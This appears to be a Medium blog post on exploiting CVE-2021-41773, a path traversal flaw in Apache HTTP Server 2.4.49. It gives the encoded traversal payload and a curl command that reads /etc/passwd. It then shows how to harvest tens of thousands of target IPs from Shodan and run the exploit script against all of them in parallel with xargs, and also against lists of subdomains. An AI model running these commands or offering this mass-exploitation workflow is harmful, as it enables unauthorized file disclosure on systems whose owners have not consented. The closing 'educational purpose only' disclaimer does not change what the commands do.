Finding and Exploiting Path traversal in apache 2.4.49 http server [CVE-2021–41773]

In October 4th Apache disclosed a vulnerability introduced on Apache HTTP Server 2.4.49 marked as CVE-2021–41773.At the same time Apache released a patch for this vulnerability with its new version 2.4.50 . This vulnerability allows an attacker to bypass path traversal protection using encoding . Bypass looks something like this.

.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Its also possible to perform rce [Remote code execution] if mode_cgi is enabled . Modern web-technology doesn’t use it anymore however old website which usage old technology are still using this functionality. Exploitation process is easy which can be performed with curl also. Lets see how we can find websites using this apache version. We will use our favorite search engine shodan.io . Using this simple query we can find potentially vulnerable apache 2.4.49 http server.

"Apache/2.4.49"

We Got 78,219 results , those server usage apache 2.4.49 but all of them are not vulnerable , we need to filter the vulnerable ones , we can do that using bash , lets mix up our script with exploit. Exploit with curl was something like that.

curl --silent --path-as-is --insecure -k "target/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

This only exploits the server and shows us the content/text of /etc/passwd. lets create a detection script with it .

Now lets download the results from shodan. But our script takes one argument at a time how can we give it multiple input .

We can filter ip from the downloaded result using regex.

cat aa4dfdb4-faba-43a1-8784-9cce0c8f46e9.json | grep -Po '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'| tee -a ip.txt

We stored all the ip on ip.txt , now lets scan it for vulnerability using our bash and xargs

cat ip.txt | xargs -n1 -P10 bash poc.sh | tee -a results.txt

we can use httprobe to detect if the target use http or https protocol.

for bug hunters , you can use the same process with all the subdomains you got.

cat subdomains.txt | httprobe | xargs -n1 -P10 bash poc.sh | tee -a result.txt

[ This article was for educational and research purpose only , we do not promote to harm others property without permission.]

--

--

--

Security Researchers | Ctf Player | Web-Application Pen-tester | Programmer

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Mobula — The Mobula Data Aggregator (Alpha version)

Supply Chain Cyber Attacks Don’t Mean Stop Patching Software

Amp (AMP) Gets Listed on KuCoin!

{UPDATE} Survival Island 3D PRO Hack Free Resources Generator

Accidental Bounty Part 2

{UPDATE} slange krybende i firkantet kamp fem puslespil Hack Free Resources Generator

Can the WiFi Owner See What You’re Searching For?

ICHI Weekly Review — Week 34 (August 16–22, 2021)

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joy Ghosh

Joy Ghosh

Security Researchers | Ctf Player | Web-Application Pen-tester | Programmer

More from Medium

Insecure Deserialization — FAQ

XSS — Cross-Site Scripting

web cache poisoning on private program on hackerone

How I Get ZeroDay Attack UFU leads to RCE on one of the Vendors.